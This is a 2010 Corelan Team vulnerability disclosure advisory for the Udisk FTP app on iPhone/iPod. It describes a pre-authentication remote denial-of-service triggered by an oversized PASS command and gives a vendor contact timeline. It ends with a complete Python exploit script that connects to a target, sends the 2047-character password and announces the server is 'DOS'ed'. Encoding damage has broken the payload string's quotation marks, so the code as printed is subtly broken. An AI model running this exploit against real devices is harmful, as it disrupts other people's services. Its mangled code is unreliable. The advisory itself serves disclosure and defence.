|------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | security@corelan.be | | | |-------------------------------------------------[ EIP Hunters ]--| | | | Vulnerability Disclosure Report | | | |------------------------------------------------------------------| Advisory : CORELAN-10-003 Disclosure date : 12th January 2010 Corelan reference : http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-003-udisk-v1-0-remote-dos/ 0×00 : Vulnerability information ——————————– [*] Product : Apple Iphone/Ipod – Udisk FTP basic edition Remote pre-auth DOS vulnerability [*] Version : 1.0 [*] Vendor : http://6tags.com [*] URL : http://6tags.com/n/index.php/iphone/udisk/intro [*] Type of vulnerability : Remote DOS [*] Risk rating : Medium [*] Issue fixed in version : [*] Vulnerability discovered by : mr_me [*] Greetings to : corelanc0d3r, rick2600, ekse & MarkoT from Corelan Team 0×01 : Vendor description of software ————————————- From the vendor website: U.Disk is an easy used application, with stand FTP server build in. With this feature, you can upload or download thousands of files by on click. Just use Copy & Paste to access files. Like your real U-Disk. 0×02 : Vulnerability details —————————- Remote Denial of Service: When the application is sent a password (PASS) command with characters of size 2047 the application crashs. Remote code execution maybe possible. 0×03 : Vendor communication ————————— [*] 3rd January, 2010 : Vendor contacted [*] 9th January 2010 : Vendor reminded of vulnerability [*] 12th January 2010 : Public Disclosure 0×04 : Exploit/PoC —————— #!/usr/bin/python print "[+] Apple Iphone/Ipod – Udisk FTP basic edition 0day Remote DOS exploit" import socket import sys def Usage(): print ("Usage: ./udisk.py \n") print ("Example:./udisk.py 192.168.2.3\n") if len(sys.argv) <> 2: Usage() sys.exit(1) else: hostname = sys.argv[1] username = "anonymous" passwd = "x41? * 2047 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 8080)) print "[+] Connecting to the target.." except: print ("[-] Connection error!") sys.exit(1) r=sock.recv(1024) print "[+] Sending payload.." sock.send("USER %s\r\n" %username) sock.send("PASS %s\r\n" %passwd) sock.send("PWD\r\n") sock.close() print "[+] Server is now DOS'ed ;)" sys.exit(0);